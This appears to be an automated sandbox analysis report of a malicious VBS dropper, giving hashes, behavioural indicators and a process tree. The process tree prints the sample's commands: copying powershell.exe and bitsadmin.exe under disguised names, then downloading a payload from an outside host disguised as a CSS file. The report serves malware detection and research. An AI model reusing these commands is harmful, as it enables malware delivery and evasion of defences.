Analysis
-
max time kernel
35s -
max time network
123s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
30-06-2020 11:36
Static task
static1
Behavioral task
behavioral1
Sample
FattDiffEmessa2020 00616840120.vbs
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
FattDiffEmessa2020 00616840120.vbs
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
FattDiffEmessa2020 00616840120.vbs
-
Size
4KB
-
MD5
df040acc717de01627876e0ee3fa86df
-
SHA1
de8d3e73eaa96d6dc3140b63808fd7fa316cdc08
-
SHA256
e96c29490b415926118a9342760a5060070e9dd415aee367cca7a0e5146a45fe
-
SHA512
9f563b9eea761dd6ef02db008a130ac207b2e610067489a29dac9f918cdda9ada9130e3b0e26aafb1653ded52f7080fbf2413fff3321c239db46b69839805db9
Score
8/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
WScript.exedescription pid process target process PID 1500 wrote to memory of 900 1500 WScript.exe cmd.exe PID 1500 wrote to memory of 900 1500 WScript.exe cmd.exe PID 1500 wrote to memory of 900 1500 WScript.exe cmd.exe PID 1500 wrote to memory of 1036 1500 WScript.exe cmd.exe PID 1500 wrote to memory of 1036 1500 WScript.exe cmd.exe PID 1500 wrote to memory of 1036 1500 WScript.exe cmd.exe PID 1500 wrote to memory of 1564 1500 WScript.exe uccBtRT.exe PID 1500 wrote to memory of 1564 1500 WScript.exe uccBtRT.exe PID 1500 wrote to memory of 1564 1500 WScript.exe uccBtRT.exe PID 1500 wrote to memory of 1564 1500 WScript.exe uccBtRT.exe -
Executes dropped EXE 1 IoCs
Processes:
uccBtRT.exepid process 1564 uccBtRT.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FattDiffEmessa2020 00616840120.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\puccBtRT.exe2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\uccBtRT.exe2⤵
-
C:\Users\Admin\AppData\Roaming\uccBtRT.exe"C:\Users\Admin\AppData\Roaming\uccBtRT.exe" /transfer najtec /download https://nowyouknowent.com/werdona/00616840120/blank.css C:\Users\Admin\AppData\Roaming\blank.css2⤵
- Executes dropped EXE